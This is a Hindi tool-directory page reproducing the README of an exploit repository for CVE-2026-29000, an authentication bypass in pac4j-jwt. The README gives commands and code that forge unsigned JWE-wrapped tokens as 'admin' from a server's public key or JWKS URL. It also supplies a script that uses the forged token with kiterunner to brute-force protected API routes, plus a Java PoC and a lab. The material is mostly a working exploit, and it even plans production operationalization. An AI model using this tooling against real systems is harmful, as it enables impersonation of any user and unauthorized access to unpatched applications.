Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-29000 — Forge JWE-लिपटे अहस्ताक्षरित JWT बनाकर pac4j-jwt हस्ताक्षर सत्यापन (CVE-2026-29000) को बायपास करें और किसी भी उपयोगकर्ता के रूप में प्रमाणित करें; इसमें Python CLI, लाइब्रेरी, Java PoC, और kiterunner रूट स्कैनिंग शामिल है। | Kitploit
उपकरण/GitHubGitHub/kernelzeroday/cve-2026-29000
प्रमाणीकरण और प्राधिकरणटोहीपेलोड जनरेशनभेद्यता विश्लेषणशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
kernelzeroday/cve-2026-29000

CVE-2026-29000

Forge JWE-लिपटे अहस्ताक्षरित JWT बनाकर pac4j-jwt हस्ताक्षर सत्यापन (CVE-2026-29000) को बायपास करें और किसी भी उपयोगकर्ता के रूप में प्रमाणित करें; इसमें Python CLI, लाइब्रेरी, Java PoC, और kiterunner रूट स्कैनिंग शामिल है।

रिपॉजिटरी देखें
935 महीने पहलेअभी तक समीक्षित नहीं

CVE-2026-29000: pac4j-jwt JwtAuthenticator प्रमाणीकरण बाईपास

पूर्ण बिल्डआउट: राइटअप, Java इन-प्रोसेस PoC, Python टोकन-फोर्ज CLI और लाइब्रेरी, टेस्ट।

सारांश

  • CVE: CVE-2026-29000 (CVSS 10, CWE-347)
  • प्रभावित: pac4j-jwt < 4.5.9 / < 5.7.9 / < 6.3.3 जब JWE + सिग्नेचर कॉन्फ़िगरेशन का उपयोग किया जाता है
  • समस्या: JWE-रैप्ड PlainJWT (अहस्ताक्षरित) सिग्नेचर सत्यापन को बाईपास करता है; केवल सर्वर RSA पब्लिक कुंजी वाला हमलावर टोकन फोर्ज कर सकता है और किसी भी उपयोगकर्ता के रूप में प्रमाणीकरण कर सकता है।

विवरण और PoC आवश्यकताओं के लिए WRITEUP.md देखें।

संरचना

पथविवरण
WRITEUP.mdCVE सारांश, मूल कारण, प्रभावित संस्करण, PoC आवश्यकताएँ, संदर्भ
RECON.mdक्या डालना है (क्लेम डिस्कवरी, ऐप-विशिष्ट क्लेम) और कहाँ सबमिट करना है (हेडर, कुकीज़, संरक्षित एंडपॉइंट ढूँढना)
OPERATIONALIZATION.mdप्रोडक्शन में चलाने के लिए क्या आवश्यक है: पैकेजिंग, कॉन्फ़िगरेशन, सुरक्षा, स्वचालन, ऑब्ज़र्वेबिलिटी, रखरखाव
scripts/kr_scan.pyटोकन फोर्ज करें और Authorization: Bearer के साथ kiterunner (~/bin/kr) चलाएँ ताकि संरक्षित API रूट्स को ब्रूट/स्कैन किया जा सके
examples/उदाहरण स्क्रिप्ट: forge_and_curl.sh, forge_and_kr.sh
lab/टोकन-फोर्ज परीक्षण के लिए Flask लैब ऐप (JWE एंडपॉइंट + JWKS)
poc/Java Maven PoC (pac4j-jwt 6.0.3 के विरुद्ध इन-प्रोसेस बाईपास)
token_forge/Python पैकेज: PEM या JWKS URL से JWE-रैप्ड PlainJWT फोर्ज करें
tests/क्लेम, फोर्ज, कुंजी, CLI के लिए Pytest टेस्ट
requirements.txtPython निर्भरताएँ (jwcrypto, requests, pytest)

Python (टोकन फोर्ज)

सेटअप

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate   # या Windows पर .venv\Scripts\activate
pip install -r requirements.txt

CLI चलाएँ

root@kitploit:~
# PEM से (जनरेट करें: openssl genrsa 2048 | openssl rsa -pubout)
python -m token_forge --public-key /path/to/pub.pem --subject admin --roles "ROLE_ADMIN,ROLE_USER"

# JWKS URL से
python -m token_forge --jwks-url https://target/.well-known/jwks.json --subject admin

# अतिरिक्त क्लेम (ऐप-विशिष्ट डिस्कवरी के लिए): --claim [email protected] --claim key=value
# विकल्प: --exp-sec, --jwks-kid, --log-file, --enable-file-logging, --verbose

आउटपुट: एक पंक्ति (फोर्ज किया गया JWT); Authorization: Bearer <token> के रूप में उपयोग करें।

Kiterunner (kr) स्वचालन

~/bin/kr में kr आवश्यक है। टोकन फोर्ज करें और Bearer प्रमाणीकरण के साथ kr brute (या kr scan) चलाएँ ताकि संरक्षित रूट्स खोजे जा सकें:

root@kitploit:~
python scripts/kr_scan.py https://target.com --jwks-url https://target.com/.well-known/jwks.json
python scripts/kr_scan.py https://target.com --public-key pub.pem -w paths.txt -o json --dry-run

विकल्पों के लिए RECON.md §4 देखें (--subject, --roles, --claim, -A, --scan, आदि)।

लाइब्रेरी

root@kitploit:~
from token_forge import forge_token, load_public_key_from_pem, load_public_key_from_jwks_url

with open("pub.pem", "rb") as f:
    key = load_public_key_from_pem(f.read())
token = forge_token(key, subject="admin", roles=["ROLE_ADMIN"], exp_sec=3600)

टेस्ट

root@kitploit:~
pytest -vv --tb=short --maxfail=1
# या चेतावनियों को त्रुटियों के रूप में:
pytest -vv -W error -W always --tb=short --maxfail=1

Java PoC

बिल्ड और रन (Java 11+ और Maven आवश्यक)

root@kitploit:~
cd poc
mvn -q compile exec:java -Dexec.mainClass="Poc"
# या केवल टोकन (इन-प्रोसेस सत्यापन के बिना):
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--token-only"
# कस्टम subject/roles के साथ:
mvn -q compile exec:java -Dexec.mainClass="Poc" -Dexec.args="--subject user --roles ROLE_A,ROLE_B"

अपेक्षित: इन-प्रोसेस चलाने पर [BYPASS] Authenticated as: admin#override और roles।

टेस्ट और कवरेज

root@kitploit:~
pytest -vv --cov=token_forge --cov-report=term-missing
pytest -vv --cov=token_forge --cov-report=html  # फिर htmlcov/index.html खोलें

Docker

root@kitploit:~
docker build -t cve-2026-29000 .
docker run --rm cve-2026-29000 pytest -vv --cov=token_forge --cov-report=term-missing

लैब (कमज़ोर टार्गेट)

Flask ऐप जो JWE स्वीकार करता है और क्लेम लौटाता है (फोर्ज + curl/kr परीक्षण के लिए)।

root@kitploit:~
docker compose up -d lab
TOKEN=$(python -m token_forge --jwks-url http://localhost:8080/.well-known/jwks.json 2>/dev/null)
curl -H "Authorization: Bearer $TOKEN" http://localhost:8080/api/me

lab/README.md देखें।

संदर्भ

  • CodeAnt AI – पूर्ण PoC और विश्लेषण
  • pac4j सुरक्षा सलाह
  • OpenCVE CVE-2026-29000
टूल डाउनलोड करें